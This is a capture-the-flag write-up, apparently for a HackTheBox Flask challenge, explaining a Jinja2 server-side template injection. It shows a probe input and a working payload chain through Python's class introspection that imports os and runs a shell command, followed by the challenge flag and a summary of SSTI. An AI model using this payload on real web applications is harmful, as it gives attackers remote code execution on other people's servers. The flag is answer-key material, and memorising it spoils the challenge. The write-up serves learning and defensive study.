0x00 preface
I just finished the first question, and immediately opened the second question
Tip: Can you exploit this simple mistake? (Can you exploit this simple mistake?)
0x01 visit website
Proudly powered by Flask/Jinja2 is prompted from the interface, first blindly guess the ssti vulnerability
First find the injection point based on past experience
0x02 injection point
url try payload
?={
{3*3}}
From here, it is clear that it is an ssti vulnerability, and it is also an injection point
0x03 exploit
Here you can use the magic method of python, first by __class__
obtaining the class of the object, and then __mro__
obtaining the class inherited by the object, because all objects are inherited from object, so that you can get the object class, and then __subclasses__
get the subclass of object , In <class 'warnings.catch_warnings'>
the namespace of the subclass, __builtins__
and finally use the __import__
method to import the os
library to execute any command. The final payload is as follows.
{
{ "".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("cat flag.txt").read() }}
flag:HTB{t3mpl4t3s_4r3_m0r3_p0w3rfu1_th4n_u_th1nk!}
0x04 summary
ssti generation principle
After the server receives the malicious input from the user, it is used as part of the web application template content without any processing. The template engine executes the statement inserted by the user that can destroy the template during the target compilation and rendering process, which may cause Problems such as sensitive information leakage, code execution, GetShell, etc.; simple string splicing does not bring about injection problems. The key depends on what you spliced. If it is a control statement, it will cause confusion between the data field and the code field. Will go out
ssti attack ideas
We know that SSTI can cause many harms, including sensitive information leakage, RCE, GetShell, etc. The key is how to use this injection point to execute the code we want to execute, so the scope of our search for exploit points is actually in the four above us. One is the syntax, built-in variables, attributes, and functions supported by the template itself, and the global variables, attributes, and functions of the pure framework. Then we consider the characteristics of the language itself, such as the object-oriented introspection mechanism, the last We only think about how to find some things defined by the application when we can’t do anything, because this is hardly documented and designed by the developer. Generally, we need to get the source code of the application to consider it.